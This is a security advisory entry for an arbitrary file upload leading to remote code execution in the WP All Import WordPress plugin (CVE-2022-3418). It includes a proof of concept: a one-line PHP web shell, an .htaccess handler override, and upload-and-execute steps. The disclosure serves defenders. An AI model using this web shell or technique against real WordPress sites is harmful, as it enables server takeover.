Lucene search
LucyWPEX-ID:CCBB74F5-1B8F-4EA6-96BC-DDF62AF7F94DHistoryOct 14, 2022 - 12:00 a.m.
WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE
2022-10-1400:00:00
lucy
73
arbitrary file upload
remote code execution
wordpress security
0.001 Low
EPSS
Percentile
45.0%
The plugin is not properly filtering which file extensions are allowed to be imported on the server, which could allow administrators in multi-site WordPress installations to upload arbitrary files
[1] Create 'poc.zip' with 2 files like below
[1-1] 'exploit.php.txt' is as follows.
----------------------------------
<?php system($_GET['cmd']); ?>
----------------------------------
[1-2] '.htaccess' is as follows.
----------------------------------
<IfModule mod_rewrite.c>
AddHandler application/x-httpd-php .php .html
</IfModule>
----------------------------------
[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'
[3] Access 'http://localhost/wp-content/uploads/wpallimport/uploads/fa5b307edb3ccdd2244b2b60b1d9c0ee/exploit.php.txt?cmd=id' in order to execute arbitrary commands.
* fa5b307edb3ccdd2244b2b60b1d9c0ee is a random string from the server response.Related
cve
cve
CVE-2022-3418
2022-11-07 10:15:11
wpvulndb
wpvulndb
WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE
2022-10-14 00:00:00
nvd
nvd
CVE-2022-3418
2022-11-07 10:15:11
cvelist
cvelist
CVE-2022-3418 WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE
2022-11-07 00:00:00
prion
prion
Design/Logic Flaw
2022-11-07 10:15:00
openvas
openvas